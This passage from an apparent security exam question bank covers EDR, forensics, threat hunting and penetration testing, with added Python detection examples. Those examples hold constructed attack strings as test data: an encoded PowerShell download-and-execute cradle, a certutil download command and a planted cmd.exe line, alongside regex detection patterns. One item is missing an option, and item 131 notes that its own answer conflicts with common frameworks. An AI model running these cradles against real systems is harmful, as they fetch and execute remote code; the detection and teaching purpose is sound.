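        if re.search(r"-(?:ep|executionpolicy)\s+bypass", cmd, re.I):
            findings.append("execution policy bypass")
        # Scan the decoded script with the same cradle pattern as the visible command line.
        if CRADLE.search(cmd + " " + (decoded or "")):
            findings.append("download/eval cradle")
    if image == "certutil.exe" and re.search(r"-urlcache|-decode", cmd, re.I):
        findings.append("certutil used to download or decode")
    if image in SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
        findings.append("script or payload in user-writable path")
    return findings


# Constructed EDR process-creation events.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
EVENTS = [
    {"parent": "svchost.exe", "image": "powershell.exe", "user": "alice",
     "cmdline": f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe", "user": "alice",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\AppData\Local\Temp\inv.ps1"},
    {"parent": "cmd.exe", "image": "certutil.exe", "user": "alice",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/x.exe C:\Users\Public\x.exe"},
    {"parent": "svchost.exe", "image": "powershell.exe", "user": "SYSTEM",
     "cmdline": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},   # legitimate scheduled task
    {"parent": "services.exe", "image": "svchost.exe", "user": "SYSTEM",
     "cmdline": "svchost.exe -k netsvcs"},
]


def triage(events=EVENTS):
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for event, findings in zip(EVENTS, triage()):
        print(event["parent"], "->", event["image"], findings or "clean")
```

The -EncodedCommand payload is base64 of UTF-16LE text, which is why the decoder uses that codec rather than UTF-8. The legitimate backup task in the fourth event produces no findings, which is the point of logging arguments instead of alerting on powershell.exe by name.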

126
Multi-Selecteasy

A security team is evaluating endpoint detection and response (EDR) solutions. They want a solution that can detect fileless malware and malicious PowerShell scripts. Which TWO capabilities should the team prioritize? (Choose TWO.)

Select 2 answers
A.Signature-based detection of known malware
B.Network traffic analysis for C2 communication
C.Behavioral monitoring of script execution (e.g., PowerShell)
D.Automated firewall rule creation
E.Memory scanning capabilities
AnswersC, E

Monitoring script behavior can detect malicious activities.

Why this answer

Fileless malware often lives in memory and uses scripting. Memory scanning and script monitoring are key. Signature-based detection may miss fileless attacks.

Automated firewall rule creation (D) is a response feature rather than a detection capability, and network traffic analysis (B) cannot see script execution in memory; it only helps once the malware talks to its C2.

127
MCQeasy

A security analyst is collecting evidence from a compromised workstation. Which of the following should be collected first to preserve volatile data?

A.Memory dump
B.Hard drive image
C.Network capture
D.Event logs
AnswerA

Memory is volatile and must be captured before power loss.

Why this answer

Volatile data includes memory contents, network connections, and running processes. Memory is the most volatile and should be captured first.

128
MCQmedium

An organization wants to detect and respond to advanced threats that may evade traditional endpoint security solutions. They deploy an EDR solution that provides real-time visibility into endpoint activities. However, the security team is overwhelmed by alerts. Which technology can be integrated with EDR to automate response actions and reduce alert fatigue?

A.SIEM with correlation rules
B.Network traffic analysis (NTA)
C.Deception technology
D.SOAR platform
AnswerD

SOAR orchestrates and automates response workflows.

Why this answer

SOAR platforms ingest alerts from various sources (including EDR) and use playbooks to automate incident response actions, such as isolating a host or blocking an IP. This reduces manual effort and alert fatigue.

129
MCQmedium

A penetration tester is in the post-exploitation phase and wants to maintain access to a compromised system. Which of the following techniques is most effective for establishing persistent access while evading detection?

A.Uploading a web shell to a publicly accessible directory
B.Creating a new local user account with administrative privileges
C.Installing a rogue certificate authority
D.Creating a scheduled task that executes a reverse shell
AnswerD

Scheduled tasks survive reboots and blend in with the legitimate maintenance jobs that already exist on most systems.

Why this answer

A scheduled task that re-launches a backdoor at boot, at logon or on a timer is a standard persistence mechanism (ATT&CK T1053.005) and can be named to resemble a vendor job. It is not invisible: task creation is recorded as Security event 4698 and in the TaskScheduler operational log, so a tester should assume a monitored environment can see it. A new administrative account (B) appears in event 4720 and in routine account reviews, a web shell in a public directory (A) is exposed to every scanner, and a rogue CA (C) enables interception rather than access.

130
Multi-Selectmedium

A SOC analyst is investigating a potential data exfiltration incident. The analyst suspects that an insider is using encrypted tunnels to transfer data. Which TWO of the following network traffic analysis (NTA) indicators are most likely to suggest encrypted exfiltration? (Choose two.)

Select 2 answers
A.Large data transfers to an external IP address during non-business hours
B.Multiple HTTP GET requests to a known content delivery network
C.A single large file upload to a cloud storage provider during work hours
D.Repeated connections to an external host on a non-standard port using TLS
E.High volumes of DNS queries to a single external domain
AnswersA, D

Exfiltration over encrypted tunnels is often timed for off-hours and shows up as volume: large transfers to a single destination are the primary indicator.

Why this answer

Unusual volumes of traffic to a single external IP, especially during off-hours (A), and repeated TLS sessions to an external host on a non-standard port (D) both fit an attacker-controlled tunnel that evades proxy inspection. HTTP GETs to a CDN (B) and a large upload to a cloud provider during the day (C) are ordinary on their own, although the latter can still be exfiltration over a sanctioned channel, which is what DLP is for. High DNS query volume to one domain (E) points to DNS tunneling, a different exfiltration channel from the encrypted tunnels in this scenario.

131
MCQmedium

During a penetration test, the tester has gained initial access to a network and now aims to move laterally to a sensitive database server. Which phase of the penetration testing lifecycle does this activity represent?

A.Exploitation
B.Post-exploitation
C.Reporting
D.Reconnaissance
AnswerA

This item classes lateral movement as exploitation: after initial access the tester is still breaking into further systems.

Why this answer

This question bank places lateral movement in the exploitation phase, because the tester is still compromising systems (here the database server) rather than reporting. Be aware that PTES and the CompTIA PenTest+ objectives list lateral movement under post-exploitation, which is also the phase item 129 on this page assumes, so read the answer choices carefully. Reconnaissance (D) happens before any access and reporting (C) comes at the end.

132
MCQmedium

A security analyst is conducting a threat hunt based on the hypothesis that an adversary may have used PowerShell to execute malicious scripts. Which threat hunting methodology is being employed?

A.IoC-driven hunting
B.TTP-driven hunting
C.Baseline-driven hunting
D.Hypothesis-driven hunting
AnswerD

The hunt begins with a hypothesis about specific adversary behavior.

Why this answer

Hypothesis-driven hunting starts with a hypothesis about potential adversary behavior, then searches for evidence. The analyst is hypothesizing that PowerShell was abused.

133
MCQhard

An organization's vulnerability management team discovers a critical vulnerability in a legacy application that cannot be patched because the vendor no longer supports it. The application is essential for business operations. Which of the following compensating controls would best reduce the risk of exploitation while maintaining functionality?

A.Apply a virtual patch using a web application firewall (WAF) rule
B.Implement network segmentation and restrict access to the application
C.Disable the application until a replacement is found
D.Increase monitoring of the application without any access restrictions
AnswerB

Segmentation limits exposure and reduces risk.

Why this answer

Network segmentation with strict firewall rules isolating the legacy application shrinks the attack surface and stops a compromised workstation from reaching it, while the application keeps working. A WAF virtual patch (A) is a reasonable extra layer if the flaw is reachable over HTTP, but it covers one protocol and one request pattern. Disabling the application (C) fails the business requirement, and monitoring without restrictions (D) detects but does not reduce the risk.

134
MCQeasy

An organization deploys honeypots to detect attackers. Which type of deception technology is being used?

A.Honeytokens
B.Bait networks
C.Honeypots
D.Honeynets
AnswerC

Honeypots are decoy systems used for deception.

Why this answer

Honeypots are decoy systems designed to lure attackers and detect unauthorized activity.

135
MCQhard

A security analyst is investigating a potential data exfiltration incident. The analyst has collected a memory dump from the affected server. Which Volatility command should the analyst use to extract the contents of the clipboard, which may contain copied sensitive data?

A.volatility -f dump.raw clipboards
B.volatility -f dump.raw windows.clipboard
C.volatility -f dump.raw clipboard
D.volatility -f dump.raw memdump --pid 1234
AnswerC

The Volatility 2 clipboard plugin reads the Windows clipboard from the memory image.

Why this answer

The clipboard plugin in Volatility 2 extracts the contents of the Windows clipboard, which can hold copied text such as passwords or the data being exfiltrated. In practice the command also needs the image profile (volatility -f dump.raw --profile=<Windows profile> clipboard), which the options omit. memdump --pid (D) dumps a process's memory, not the clipboard; 'clipboards' (A) is not a plugin name, and 'windows.clipboard' (B) mimics the Volatility 3 naming scheme, but the clipboard plugin belongs to Volatility 2.

136
Multi-Selectmedium

A penetration tester is performing reconnaissance against a target. Which TWO of the following are examples of active reconnaissance? (Select TWO.)

Select 2 answers
A.Banner grabbing
B.Social media profiling
C.Port scanning
D.WHOIS lookup
E.Searching job postings for technology details
AnswersA, C

Banner grabbing connects to services to read banners.

Why this answer

Active reconnaissance involves direct interaction with the target. Port scanning and banner grabbing send packets to the target's systems and can appear in its logs; WHOIS lookups, social media profiling and job-posting searches query third parties and are passive, leaving no trace on the target.

137
Multi-Selecthard

During an incident response, a forensic examiner is collecting evidence from a compromised Windows workstation. The examiner must follow proper order of volatility to preserve potential evidence. Which THREE of the following items should be collected first, before the others? (Choose THREE.)

Select 3 answers
A.Master File Table (MFT) from the hard drive
B.Event logs from the Security log
C.List of active network connections
D.List of running processes
E.Contents of RAM (memory dump)
AnswersC, D, E

Network state can change quickly.

Why this answer

The order of volatility dictates that the most volatile data (registers, cache, memory, network connections, running processes) is collected first. Network connections and process lists live in RAM and are gone when the system is powered off; the MFT and the Security event log are on disk, survive a shutdown, and can be collected from the disk image later.

138
MCQeasy

During a threat hunting exercise, a security analyst hypothesizes that adversaries may be using PowerShell to execute commands in memory. Which threat hunting methodology is being employed?

A.Signature-based hunting
B.TTP-driven hunting
C.Hypothesis-driven hunting
D.IoC-driven hunting
AnswerC

The analyst is starting with a hypothesis about PowerShell usage, which is hypothesis-driven.

Why this answer

Hypothesis-driven hunting starts with a hypothesis about potential adversary behavior, then searches for evidence. IoC-driven uses indicators of compromise, and TTP-driven focuses on tactics, techniques, and procedures.

139
MCQeasy

A security analyst is reviewing a suspicious file. Which static analysis technique would the analyst use to examine the file without executing it?

A.Submit the file to VirusTotal
B.Execute the file in a debugger
C.Run the file in a sandbox
D.Use strings to extract readable text
AnswerD

strings reads the file's bytes without executing it.

Why this answer

Static analysis examines the file without running it. strings extracts readable text from the binary, which can reveal URLs, IP addresses, registry paths or commands. Submitting to VirusTotal (A) is a reputation lookup rather than analysis, and both a debugger (B) and a sandbox (C) execute the file, which makes them dynamic analysis. Windows binaries frequently store text as UTF-16LE, which GNU strings only finds with the -e l option.
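A strings implementation with the UTF-16LE handling the explanation mentions, followed by a triage pass for the indicators an analyst looks for, as an added Python example (not code from the question bank). The sample bytes are a constructed stand-in for a suspicious binary; the planted URL, registry path and command are the only meaningful content in them:

```python
"""strings with ASCII and UTF-16LE extraction plus indicator triage
(added example, not from the page)."""
import re


def extract_strings(data, min_len=6):
    """Return (offset, encoding, text) for printable runs of at least min_len characters."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)   # each char followed by NUL
    found = [(m.start(), "ascii", m.group().decode("ascii")) for m in ascii_run.finditer(data)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16le")) for m in utf16_run.finditer(data)]
    return sorted(found)


INDICATORS = {
    "url": re.compile(r"https?://[^\s'\"<>]+", re.I),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "shell": re.compile(r"\b(?:cmd\.exe|powershell|rundll32|regsvr32|mshta)\b", re.I),
    "run_key": re.compile(r"CurrentVersion\\Run", re.I),
}


def triage(strings):
    """Tag every extracted string that matches one of the indicator patterns."""
    hits = []
    for offset, enc, text in strings:
        for label, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.append((label, offset, enc, text))
    return hits


# Constructed stand-in for a suspicious PE: non-printable junk around planted strings.
JUNK = bytes(range(0, 32)) + bytes(range(127, 256))
SAMPLE = (b"MZ\x90\x00" + JUNK
          + b"http://198.51.100.7/stage2.bin\x00" + JUNK
          + "cmd.exe /c whoami > C:\\Users\\Public\\o.txt".encode("utf-16le") + JUNK
          + b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00" + JUNK
          + b"OK\x00" + JUNK)          # too short to be reported at min_len=6


if __name__ == "__main__":
    found = extract_strings(SAMPLE)
    for offset, enc, text in found:
        print(f"{offset:#08x} {enc:8s} {text}")
    for label, offset, enc, text in triage(found):
        print(f"[{label}] {offset:#08x} {text}")
```

The UTF-16LE run in the sample (cmd.exe /c whoami ...) is invisible to an ASCII-only scan because every character is separated by a NUL byte, the same gap that makes strings -e l necessary on Windows samples. The offsets let the analyst jump straight to the string in a hex editor or disassembler.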

140
MCQmedium

A security operations center (SOC) is implementing a SOAR platform to automate responses to phishing incidents. The playbook will include steps to automatically quarantine suspicious emails, delete them from user mailboxes, and block the sender's domain. Which element should the SOAR playbook incorporate to ensure the automated response does not cause unintended disruption?

A.An automatic rollback script that restores quarantined emails after 24 hours if no user complaint
B.Integration with threat intelligence to verify the sender domain reputation score before blocking
C.A confirmation step that prompts the analyst to approve the quarantine and deletion actions
D.A manual approval step before executing any automated response
AnswerC

Having the analyst approve destructive actions like deletion reduces the risk of removing legitimate emails.

Why this answer

Automated actions can do damage when the input is a false positive. Requiring an analyst to approve the destructive steps (quarantine and deletion) while leaving enrichment and URL extraction automated keeps the speed benefit without the risk. Option D gates every action, including harmless ones, and loses most of the automation; a rollback after 24 hours (A) acts only after the disruption has happened, and a reputation score (B) informs the decision but does not prevent a wrong one.

141
Multi-Selectmedium

A security operations team is implementing deception technology to detect lateral movement. Which TWO of the following are examples of deception technologies? (Select TWO.)

Select 2 answers
A.Honeytoken
C.Endpoint detection and response (EDR)
D.Security information and event management (SIEM)
E.Honeypot
AnswersA, E

Honeytokens are deceptive tokens like fake credentials.

Why this answer

Honeypots are decoy systems, and honeytokens are fake credentials or data used to trigger alerts when accessed.

142
MCQhard

During a penetration test, the tester successfully gains initial access to a web server and wants to move laterally to a database server. The web server uses a service account that has local admin rights on the database server. What is the most effective technique for lateral movement in this scenario?

A.Exploit a SQL injection vulnerability in the database server
B.Brute-force the database server administrator password
C.Use a keylogger to capture credentials on the web server
D.Pass-the-Hash
AnswerD

The service account's NT hash, dumped from the web server, can be replayed to authenticate to the database server.

Why this answer

Pass-the-Hash authenticates over NTLM with the account's NT hash instead of its password, so it works as soon as the tester can dump that hash from the web server (from LSASS or the SAM, which needs local administrator or SYSTEM there) and the database server accepts NTLM logons for the account over SMB, WMI or WinRM. SQL injection (A) and brute force (B) attack the database service rather than reusing the trust the tester already holds, and a keylogger (C) only helps if someone types the service account's password, which service accounts rarely do.

143
MCQmedium

During an incident response engagement, the security team identifies that a compromised host has been communicating with multiple external IP addresses using encrypted channels. The team needs to determine which processes initiated the connections. Which type of evidence collection should be performed first to preserve the most volatile data?

A.Export the Windows event logs related to network activity
B.Execute a network scan from the compromised host to identify active connections
C.Capture a full disk image using FTK Imager
D.Perform a memory capture using a tool like DumpIt or winpmem
AnswerD

Memory capture preserves the most volatile data, including running processes and network connections, which is critical for identifying malicious processes.

Why this answer

In digital forensics, the order of volatility dictates that volatile data (e.g., running processes, network connections) should be collected first because it is lost when the system is powered down. Memory capture preserves this data, including process information and active network connections.

144
MCQhard

A security engineer is configuring a SIEM correlation rule to detect a potential data exfiltration attempt. The rule should trigger when a single internal host sends more than 10 MB of data to an external IP address that has never been communicated with before, within a 5-minute window. Additionally, the external IP should not be on any whitelist. Which correlation logic best implements this detection?

A.Alert when a host sends >10 MB to an external IP that is not in the whitelist and not seen in the last 24 hours, aggregated over 5 minutes.
B.Alert when a host sends >10 MB to an external IP not in the whitelist and the destination port is 443.
C.Alert when any host sends >10 MB to an external IP not in the whitelist within 5 minutes.
D.Alert when a host sends >10 MB to any external IP aggregated over 5 minutes, then filter out whitelisted IPs.
AnswerA

Aggregates volume per source and destination over the window and checks both the first-contact condition and the whitelist.

Why this answer

The rule must aggregate bytes from a single source IP to a single destination IP over a 5-minute window, check that the total exceeds 10 MB, and verify that the destination is new (not seen in the previous 24 hours) and not whitelisted. Option A is the only choice that includes all three conditions. Option B swaps the first-contact check for a port filter, option C drops it entirely, and option D aggregates and then filters the whitelist but never tests whether the destination was seen before.
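The correlation logic of option A run over a handful of constructed flow records, as an added Python example (not code from the question bank and not a rule in any particular SIEM's syntax). The addresses, sizes and timestamps are invented to exercise the conditions: a genuine first-contact burst, an allow-listed destination, a destination seen two hours earlier, and a transfer too slow to exceed the threshold within any 5-minute window:

```python
"""SIEM-style correlation: >10 MB to a first-contact external IP within 5 minutes
(added example, not from the page)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

MB = 1024 * 1024
THRESHOLD_BYTES = 10 * MB
WINDOW = timedelta(minutes=5)
LOOKBACK = timedelta(hours=24)
ALLOWLIST = {"203.0.113.10"}                 # constructed: approved off-site backup target
T0 = datetime(2024, 3, 4, 2, 0)              # constructed timeline; 02:00 is off-hours


def flow(src, dst, minute, nbytes):
    """One normalised egress flow record (constructed)."""
    return {"src": src, "dst": dst, "ts": T0 + timedelta(minutes=minute), "bytes": nbytes}


FLOWS = [
    # 1) 12 MB in 3 minutes to an address nobody has talked to before -> alert
    flow("10.0.0.5", "198.51.100.7", 0, 3 * MB), flow("10.0.0.5", "198.51.100.7", 1, 3 * MB),
    flow("10.0.0.5", "198.51.100.7", 2, 3 * MB), flow("10.0.0.5", "198.51.100.7", 3, 3 * MB),
    # 2) 15 MB to the allow-listed backup target -> no alert
    flow("10.0.0.9", "203.0.113.10", 0, 15 * MB),
    # 3) 12 MB to a host first contacted two hours earlier -> known destination, no alert
    flow("10.0.0.12", "192.0.2.44", -120, 20 * 1024), flow("10.0.0.12", "192.0.2.44", 5, 12 * MB),
    # 4) 12 MB to a new host spread over 30 minutes -> never >10 MB in any 5-minute window
    flow("10.0.0.20", "198.51.100.99", 0, 3 * MB), flow("10.0.0.20", "198.51.100.99", 10, 3 * MB),
    flow("10.0.0.20", "198.51.100.99", 20, 3 * MB), flow("10.0.0.20", "198.51.100.99", 30, 3 * MB),
]


def detect_first_contact_exfil(flows, allowlist=ALLOWLIST, threshold=THRESHOLD_BYTES,
                               window=WINDOW, lookback=LOOKBACK):
    """Stream flows in time order; alert once per (src, dst) when the bytes inside
    the sliding window exceed the threshold AND dst is not allow-listed AND no host
    contacted dst during the lookback period before the window opened."""
    contacts = defaultdict(list)     # dst -> timestamps of every flow to it seen so far
    recent = defaultdict(deque)      # (src, dst) -> (ts, bytes) still inside the window
    alerts, fired = [], set()
    for f in sorted(flows, key=lambda r: r["ts"]):
        src, dst, ts = f["src"], f["dst"], f["ts"]
        q = recent[(src, dst)]
        q.append((ts, f["bytes"]))
        while ts - q[0][0] > window:
            q.popleft()
        window_start = q[0][0]
        total = sum(b for _, b in q)
        seen_before = any(window_start - lookback <= t < window_start for t in contacts[dst])
        contacts[dst].append(ts)
        if (total > threshold and dst not in allowlist and not seen_before
                and (src, dst) not in fired):
            fired.add((src, dst))
            alerts.append({"src": src, "dst": dst, "bytes": total,
                           "window_start": window_start, "window_end": ts})
    return alerts


if __name__ == "__main__":
    for a in detect_first_contact_exfil(FLOWS):
        print(f"ALERT {a['src']} -> {a['dst']}: {a['bytes'] // MB} MB "
              f"between {a['window_start']:%H:%M} and {a['window_end']:%H:%M}")
```

The first-contact test looks only at contacts made before the window opened, so the flows inside the burst do not mark the destination as "known" while the burst is still being counted. The alert fires once per (src, dst) pair; a production rule would also pull the host's user and process context from the EDR for the analyst.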

145
MCQhard

During a threat hunting exercise, a hunter uses the MITRE ATT&CK framework to identify a series of behaviors: an attacker used PowerShell to download a payload, then created a scheduled task for persistence, and finally performed credential dumping via LSASS. Which ATT&CK tactic is associated with the credential dumping technique?

A.Defense Evasion
B.Credential Access
C.Execution
D.Persistence
AnswerB

Credential Access is the tactic for stealing credentials, such as dumping LSASS.

Why this answer

Credential dumping from LSASS memory is technique T1003.001 (OS Credential Dumping: LSASS Memory) under the Credential Access tactic in MITRE ATT&CK; a tactic names the adversary's goal, here stealing credentials. In the same chain, the PowerShell download falls under Execution and the scheduled task under Persistence; Defense Evasion would apply to steps such as clearing logs or disabling security tools.

146
Multi-Selectmedium

A penetration tester is conducting a test against a web application. The client has defined rules of engagement that prohibit any denial of service attacks. The tester discovers an endpoint that is vulnerable to command injection. Which THREE of the following actions should the tester take to validate the vulnerability while staying within scope? (Choose THREE.)

Select 3 answers
A.Use the echo command to write a file on the server
B.Run a whoami command to confirm the user context
C.Delete a random system file to observe impact
D.Flood the endpoint with multiple requests to test resilience
E.Execute a ping command to a controlled server to verify code execution
AnswersA, B, E

Writing a harmless file can prove execution without damage.

Why this answer

To validate command injection without causing damage, the tester uses non-destructive commands: whoami confirms the user context, echo writes a harmless marker file to a location the tester records and removes afterwards, and a ping to a tester-controlled host proves execution out of band even when the application returns no output. Deleting a system file (C) or flooding the endpoint (D) would violate the rules of engagement.

147
Multi-Selecthard

An incident response team is handling a ransomware incident. The team has successfully contained the threat and is now in the eradication phase. Which THREE actions are appropriate for the eradication phase? (Select THREE.)

Select 3 answers
A.Restore systems from clean backups
B.Apply security patches to the vulnerability that allowed initial access
C.Revoke and reset all compromised user and service accounts
D.Delete all infected files and registry keys associated with the ransomware
E.Conduct a lessons learned meeting
AnswersB, C, D

Patching the entry point prevents re-infection.

Why this answer

Eradication removes the threat completely: deleting the ransomware's files and persistence (D), revoking and resetting the credentials the attacker captured (C), and patching the vulnerability used for initial access (B). Restoring from clean backups (A) belongs to the recovery phase, and the lessons learned meeting (E) is post-incident activity.
